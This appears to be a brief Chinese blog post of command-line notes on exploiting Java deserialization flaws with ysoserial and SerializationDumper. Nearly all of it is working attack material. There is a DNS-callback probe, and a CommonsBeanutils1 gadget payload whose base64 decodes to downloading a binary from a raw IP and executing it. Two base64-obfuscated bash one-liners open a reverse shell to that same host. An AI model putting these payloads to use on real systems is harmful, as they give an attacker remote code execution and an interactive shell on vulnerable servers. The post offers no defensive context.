XhstormR


On a dark desert highway, cool wind in my hair.


Java 反序列化漏洞利用

Updated on 2021-01-27

探测:
java -jar ysoserial-master-SNAPSHOT.jar URLDNS "http://y8jhkk.dnslog.cn" > URLDNS.bin

利用:
java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "bash -c {echo,d2dldCAtcU8gMTdLNm9NQzUgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSBodHRwOi8vNDcuOTguMTM1LjY1OjgwODAvbGpDUHh6dDsgY2htb2QgK3ggMTdLNm9NQzU7IC4vMTdLNm9NQzU=}|{base64,-d}|{bash,-i}" > CommonsBeanutils1.bin
转储为文本格式:
java -jar SerializationDumper-v1.13.jar -r CommonsBeanutils1.bin > CommonsBeanutils1.txt

还原为二进制流:
java -jar SerializationDumper-v1.13.jar -b CommonsBeanutils1.txt CommonsBeanutils1.ok.bin
计算 serialVersionUID -3490850999041592962 序列化后的值:
busybox printf "%016x" -3490850999041592962 |^
busybox fold -w2 |^
busybox paste -sd" "
----
cf 8e 01 82 fe 4e f1 7e
Shell 中执行命令:
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45OC4xMzUuNjUvNDM5OSAwPiYx}|{base64,-d}|{bash,-i}'

Java 中执行命令:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45OC4xMzUuNjUvNDM5OSAwPiYx}|{base64,-d}|{bash,-i}

Reference

TOP